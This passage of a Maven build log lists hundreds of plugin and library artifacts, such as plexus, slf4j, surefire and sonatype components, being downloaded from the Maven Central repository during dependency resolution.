https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.0/maven-reporting-api-3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-api/3.1.1/maven-reporting-api-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting-impl/3.2.0/maven-reporting-impl-3.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/reporting/maven-reporting/2.0.6/maven-reporting-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-api/1.4.1/maven-resolver-api-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver-util/1.4.1/maven-resolver-util-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/resolver/maven-resolver/1.4.1/maven-resolver-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-artifact-transfer/0.13.1/maven-artifact-transfer-0.13.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.1.0/maven-common-artifact-filters-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-common-artifact-filters/3.3.2/maven-common-artifact-filters-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-analyzer/1.14.1/maven-dependency-analyzer-1.14.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-dependency-tree/3.3.0/maven-dependency-tree-3.3.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-filtering/3.1.1/maven-filtering-3.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/15/maven-shared-components-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/18/maven-shared-components-18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/19/maven-shared-components-19.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/21/maven-shared-components-21.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/30/maven-shared-components-30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/33/maven-shared-components-33.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/37/maven-shared-components-37.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/39/maven-shared-components-39.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/42/maven-shared-components-42.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-incremental/1.1/maven-shared-incremental-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/0.1/maven-shared-utils-0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.0/maven-shared-utils-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.0.1/maven-shared-utils-3.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.1.0/maven-shared-utils-3.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.2.1/maven-shared-utils-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.4.2/maven-shared-utils-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/maven-surefire-common/2.22.1/maven-surefire-common-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-api/2.22.1/surefire-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-booter/2.22.1/surefire-booter-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire-logger-api/2.22.1/surefire-logger-api-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/surefire/surefire/2.22.1/surefire-2.22.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity-tools/2.0/velocity-tools-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.6.2/velocity-1.6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/velocity/velocity/1.7/velocity-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/assertj/assertj-bom/3.25.3/assertj-bom-3.25.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy-xml/3.0.9/groovy-xml-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/groovy/groovy/3.0.9/groovy-3.0.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/exec-maven-plugin/1.1.1/exec-maven-plugin-1.1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/mojo/mojo-parent/20/mojo-parent-20.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.3/plexus-archiver-3.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/3.4/plexus-archiver-3.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/4.9.2/plexus-archiver-4.9.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-classworlds/2.2.3/plexus-classworlds-2.2.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-api/2.8.4/plexus-compiler-api-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-javac/2.8.4/plexus-compiler-javac-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler-manager/2.8.4/plexus-compiler-manager-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compiler/2.8.4/plexus-compiler-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-compilers/2.8.4/plexus-compilers-2.8.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.5.4/plexus-component-annotations-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.6/plexus-component-annotations-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/1.7.1/plexus-component-annotations-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.0.0/plexus-component-annotations-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-component-annotations/2.1.0/plexus-component-annotations-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.12/plexus-components-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.14/plexus-components-1.1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.18/plexus-components-1.1.18.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3.1/plexus-components-1.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/4.0/plexus-components-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/6.6/plexus-components-6.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.0.3/plexus-containers-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.7.1/plexus-containers-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.0.0/plexus-containers-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.1.0/plexus-containers-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.22/plexus-interpolation-1.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-languages/0.9.10/plexus-languages-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.0.4/plexus-utils-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.1/plexus-utils-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.5/plexus-utils-1.5.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.8/plexus-utils-1.5.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.10/plexus-1.0.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.11/plexus-1.0.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.12/plexus-1.0.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.4/plexus-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/13/plexus-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/16/plexus-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/17/plexus-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.2/plexus-2.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.6/plexus-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.2/plexus-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/8/plexus-8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit-parent/5.13.0.202109080827-r/org.eclipse.jgit-parent-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.0/junit-bom-5.10.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.1/junit-bom-5.10.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.2/junit-bom-5.10.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.3/junit-bom-5.10.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.7.2/junit-bom-5.7.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.9.3/junit-bom-5.9.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5.1/ow2-1.5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5/ow2-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.30/slf4j-api-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.5.6/slf4j-parent-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.30/slf4j-parent-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.32/slf4j-parent-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.36/slf4j-parent-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-parent/1.7/aether-parent-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/4/forge-parent-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/5/forge-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/6/forge-parent-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/5/oss-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-bean/1.4.2/guice-bean-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-plexus/1.4.2/guice-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7-noaop.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.pom +Downloaded from central: 